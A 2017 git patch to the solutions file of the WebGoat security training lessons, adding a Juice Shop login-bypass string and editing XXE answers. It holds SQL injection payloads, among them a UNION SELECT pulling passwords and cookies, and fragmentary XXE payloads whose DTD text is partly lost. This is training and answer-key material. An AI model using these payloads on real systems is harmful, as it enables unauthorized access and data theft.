From 3a9bb946edef36a644b08030f77a5d5a133bb934 Mon Sep 17 00:00:00 2001
From: Jason White
Date: Tue, 27 Jun 2017 08:27:06 -0400
Subject: [PATCH] update for XXE solutions
---
webgoat-lessons/sol.txt | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
index c686e4396..9fa1aa3a4 100644
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@@ -3,6 +3,9 @@ Basic Smith - to show it returns smith's records Smith' or '1'='1 - to show exploit; 1=1 can be any true clause +**Bender Login +bender@juice-sh.op' -- + [2:19 PM] 101 101 or 1=1
@@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from ## XXE ## -Simple - ]> &root;test +Simple ]> &root;test Modern Rest Framework - change content type to: Content-Type: application/xml && ]> &root;test